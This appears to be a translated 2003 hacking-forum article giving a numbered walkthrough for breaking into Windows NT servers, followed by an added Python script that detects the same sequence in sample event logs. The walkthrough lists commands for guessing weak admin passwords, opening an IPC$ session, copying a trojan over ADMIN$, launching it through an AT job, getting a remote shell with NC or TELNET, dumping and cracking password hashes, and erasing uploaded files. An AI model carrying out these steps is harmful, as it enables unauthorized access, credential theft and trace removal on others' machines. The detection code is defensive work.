An intrusion method you can understand at a glance (NT) | http://www.cshu.net




            www.cshu.net  2003-3-24  fog rain village

              1. This method requires the following tools: PINGER; LETMEIN;
              NTSRV; NETSVC; PWDDUMP; NC; L0PHTCRACK
              2. To start, scan an IP range with PINGER, find a target, and
              pick it.
              3. Open a DOS prompt and use LETMEIN:
              C:\>LETMEIN \\IP -admin -D MYPWD
              This probes the site for a USER and PASSWD. If it finds none, try
              other sites; you will usually find a few fools. Here we take
              USER=KAWE PASSWD=KAWEN as the example.
              4. Open the IPC connection:
              C:\>NET USE \\IP\IPC$ "KAWEN" /USER:"KAWEN"
              5. Once in, copy the tools NTSRV, NETSVC and PWDDUMP across.
              Method: COPY C:\HACK2\NTSRV.EXE \\IP\ADMIN$\SYSTEM32
              6. Start the trojan program (NTSRV.EXE) listening on port 64321:
              C:\>NETSVC \\IP SCHEDULE /START (starts SCHEDULE)
              C:\>AT \\IP 13:00 NTSRV.EXE /PORT:64321 |NOMSG
              (SCHEDULE starts NTSRV.EXE, which listens on 64321)
              7. Success. Start the trojan client (NETBUS), fill in the IP under
              HOSTNAME/IP, fill in 64321 under PORT, and choose CONNECT.
              8. Choose GETINFO; a message comes back showing that NT on the
              remote machine is in WINNT on the C drive.
              9. Choose APPREDIRECT, since we want to use its CMD.EXE. In the
              window that pops up, fill in:
              C:\>C:\WINNT\SYSTEM32\CMD.EXE
              PORT:64321
              10. We can control it in two ways, TELNET and NC:
              TELNET IP 64321
              NC IP 64321
              and view the shares with NET VIEW.
              11. Run PWDDUMP.EXE over TELNET or NC, pull SERVER.LC back using
              NETBUS, and crack it with L0PHTCRACK:
              C:\WINNT\SYSTEM32>PWDDUMP >SERVER.LC (crack the passwords with
              L0PHTCRACK)
              12. With the PASSWD in hand you can do as you please; don't forget
              to delete the FILEs you uploaded to his machine.
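
              Seen from the target's side, steps 4 to 6 have a recognizable
              shape: an IPC$ session, an executable written over ADMIN$, the
              Schedule service started, and an AT job that runs the file just
              written. The Python below is an added example, not part of the
              original article; it correlates that sequence over constructed,
              normalized event records whose field names and event types are
              assumptions, not a real Windows log format.

```python
from datetime import datetime, timedelta

# Constructed, normalized events (field names are assumptions, not a real log schema).
SAMPLE_EVENTS = [
    {"ts": "2003-03-24T12:40:05", "src": "10.0.0.7", "host": "SRV1", "type": "share_connect", "share": "IPC$"},
    {"ts": "2003-03-24T12:41:10", "src": "10.0.0.7", "host": "SRV1", "type": "file_write", "share": "ADMIN$", "path": r"SYSTEM32\NTSRV.EXE"},
    {"ts": "2003-03-24T12:43:00", "src": "10.0.0.7", "host": "SRV1", "type": "service_start", "service": "Schedule"},
    {"ts": "2003-03-24T12:44:30", "src": "10.0.0.7", "host": "SRV1", "type": "at_job", "command": "NTSRV.EXE /PORT:64321"},
    # Unrelated admin activity on another server: a write and a job that do not match.
    {"ts": "2003-03-24T09:00:00", "src": "10.0.0.9", "host": "SRV2", "type": "file_write", "share": "ADMIN$", "path": r"SYSTEM32\PATCH.EXE"},
    {"ts": "2003-03-24T09:05:00", "src": "10.0.0.9", "host": "SRV2", "type": "at_job", "command": "BACKUP.CMD /FULL"},
]

EXEC_EXT = (".exe", ".com", ".bat", ".cmd", ".dll")

def find_copy_then_schedule(events, window=timedelta(hours=1)):
    """Alert when a file written over ADMIN$ is later run by an AT job from the same source."""
    staged = {}  # (src, host, filename) -> time the file was written
    seen = {}    # (src, host) -> supporting context observed so far
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        ts = datetime.fromisoformat(ev["ts"])
        pair = (ev["src"], ev["host"])
        if ev["type"] == "share_connect" and ev["share"].upper() == "IPC$":
            seen.setdefault(pair, set()).add("ipc_session")
        elif ev["type"] == "service_start" and ev["service"].lower() == "schedule":
            seen.setdefault(pair, set()).add("schedule_started")
        elif ev["type"] == "file_write" and ev["share"].upper() == "ADMIN$":
            name = ev["path"].replace("/", "\\").rsplit("\\", 1)[-1].lower()
            if name.endswith(EXEC_EXT):
                staged[pair + (name,)] = ts
        elif ev["type"] == "at_job":
            words = ev["command"].split()
            if not words:
                continue
            name = words[0].rsplit("\\", 1)[-1].lower()
            wrote = staged.get(pair + (name,))
            if wrote is not None and ts - wrote <= window:
                alerts.append({"host": ev["host"], "src": ev["src"], "binary": name,
                               "command": ev["command"], "context": sorted(seen.get(pair, ()))})
    return alerts

if __name__ == "__main__":
    for alert in find_copy_then_schedule(SAMPLE_EVENTS):
        print(alert)
```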

